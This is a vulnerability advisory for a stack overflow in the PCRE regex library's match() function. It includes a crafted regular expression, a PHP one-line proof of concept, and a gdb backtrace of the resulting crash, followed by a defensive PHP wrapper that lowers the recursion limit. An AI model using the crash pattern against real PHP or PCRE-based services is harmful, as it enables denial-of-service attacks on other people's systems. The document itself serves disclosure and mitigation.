I. Summary
PCRE is a regular expression C library inspired by the regular expression capabilities of the Perl programming language. The PCRE library is incorporated into a number of prominent programs, such as Adobe Flash, Apache, Nginx, and PHP.
The PCRE library is prone to a vulnerability that leads to a stack overflow. Without sufficient bounds checking inside match(), the stack can be overflowed via a crafted regular expression. Since the PCRE library is widely used, this vulnerability is likely to affect many applications. At a minimum, an attacker may exploit this issue to cause a denial of service against the user running the affected application.
------------------------------------------------------------------
II. Description
The latest version of PCRE is prone to a stack overflow vulnerability that can be triggered by the following regular expression.
/^(?:(?(1)\\.|([^\\\\W_])?)+)+$/
To reproduce the problem, use the pcretest utility shipped with the PCRE library, or an application that embeds PCRE, such as PHP.
For pcretest, simply type the regular expression at the re> prompt.
For PHP, the latest version, PHP 5.6.9 (bundled with PCRE 8.37), can be triggered with the following code snippet.
<?php
preg_match("/^(?:(?(1)\\\\.|([^\\\\\\\\W_])?)+)+$/","abcd",$arr);
?>
Other versions and applications may also be affected.
The following test was conducted under Kali Linux (Debian-based, x64) with PHP 5.6.9:
==============================================================
(gdb) r poc.php
Program received signal SIGSEGV, Segmentation fault.
0x000000000047294f in match (eptr=0x7ffff7eb7d91 "DLAB",
ecode=0x10070ad "\035\\\fw", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4,
md=0x7fffffffa9a0, eptrb=0x0, rdepth=11130)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
1439 RMATCH(eptr, ecode, offset_top, md, eptrb, RM49);
(gdb) bt
#0 0x000000000047294f in match (eptr=0x7ffff7eb7d91 "DLAB",
ecode=0x10070ad "\035\\\fw", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4,
md=0x7fffffffa9a0, eptrb=0x0, rdepth=11130)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
#1 0x000000000047e2ee in match (eptr=0x7ffff7eb7d91 "DLAB",
ecode=0x10070dd "y", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4,
md=<optimized out>, eptrb=0x0, rdepth=11129)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:2061
#2 0x0000000000472f45 in match (eptr=0x7ffff7eb7d90 "ADLAB",
ecode=0x10070b4 "\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
md=0x7fffffffa9a0, eptrb=0x7fffff7ffa00, rdepth=11128)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:983
#3 0x0000000000472e2d in match (eptr=0x7ffff7eb7d90 "ADLAB",
ecode=0x10070b3 "\222\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
md=0x7fffffffa9a0, eptrb=0x7fffff7ffa00, rdepth=11127)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1878
#4 0x0000000000472957 in match (eptr=0x7ffff7eb7d90 "ADLAB",
ecode=0x10070b3 "\222\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
md=0x7fffffffa9a0, eptrb=0x0, rdepth=11126)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
#5 0x000000000047e2ee in match (eptr=0x7ffff7eb7d90 "ADLAB",
ecode=0x10070e0 "y", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
md=<optimized out>, eptrb=0x0, rdepth=11125)
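The backtrace above shows match() recursing past rdepth=11130 before the C stack is exhausted. As an added mitigation example (not part of this advisory or of PCRE/PHP), the wrapper below lowers PHP's pcre.recursion_limit setting, which PCRE enforces via its match_limit_recursion counter, so that a runaway pattern is refused with a PCRE error code instead of crashing the process; it assumes the limit chosen (2000) is well below the crashing depth and fits in the available stack, and it reuses the Section II pattern verbatim from the PHP snippet above.

```php
<?php
// Added example, not the advisory's PoC: run preg_match() under an
// explicit PCRE recursion limit so that deep match() recursion is
// aborted by PCRE itself rather than overflowing the stack.
function bounded_preg_match($pattern, $subject, &$matches, $recursionLimit = 2000)
{
    // Assumption: $recursionLimit is far below the depth observed in the
    // crash backtrace (rdepth=11130), so PCRE stops before the stack does.
    $old = ini_set('pcre.recursion_limit', (string) $recursionLimit);
    try {
        $rc  = preg_match($pattern, $subject, $matches);
        $err = preg_last_error();
    } finally {
        // Restore the process-wide setting for other callers.
        ini_set('pcre.recursion_limit', $old);
    }
    if ($rc === false) {
        // preg_match() returns false when PCRE reports an error;
        // preg_last_error() tells us which limit stopped the match.
        return array('ok' => false, 'error' => $err);
    }
    return array('ok' => true, 'matched' => ($rc === 1));
}

// Constructed test inputs: the Section II pattern (copied verbatim from the
// advisory's PHP snippet) and a benign pattern for comparison.
$tests = array(
    "/^(?:(?(1)\\\\.|([^\\\\\\\\W_])?)+)+$/" => "abcd",
    "/^[a-z]+$/"                              => "abcd",
);

foreach ($tests as $pattern => $subject) {
    $r = bounded_preg_match($pattern, $subject, $m);
    if ($r['ok']) {
        printf("%s => %s\n", $pattern, $r['matched'] ? 'match' : 'no match');
        continue;
    }
    // Either limit is an acceptable outcome: the match is rejected, not crashed.
    if ($r['error'] === PREG_RECURSION_LIMIT_ERROR) {
        $name = 'PREG_RECURSION_LIMIT_ERROR';
    } elseif ($r['error'] === PREG_BACKTRACK_LIMIT_ERROR) {
        $name = 'PREG_BACKTRACK_LIMIT_ERROR';
    } else {
        $name = 'preg error ' . $r['error'];
    }
    printf("%s => rejected (%s)\n", $pattern, $name);
}
```

Callers that treat a false return from preg_match() as a match failure (rather than as "no match") get a controlled rejection here; the same counter is available to C callers through pcre_extra with PCRE_EXTRA_MATCH_LIMIT_RECURSION.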
------------------------------------------------------------------
III. Impact
Stack Overflow
------------------------------------------------------------------
IV. Affected
PCRE 8.33, 8.34, 8.35, 8.36, 8.37 are confirmed to be vulnerable.
PCRE2 10.10 is also confirmed to be vulnerable.
Other applications may also be affected.
------------------------------------------------------------------
V. Credit
Wen Guanxing from Venustech ADLAB is credited for this vulnerability.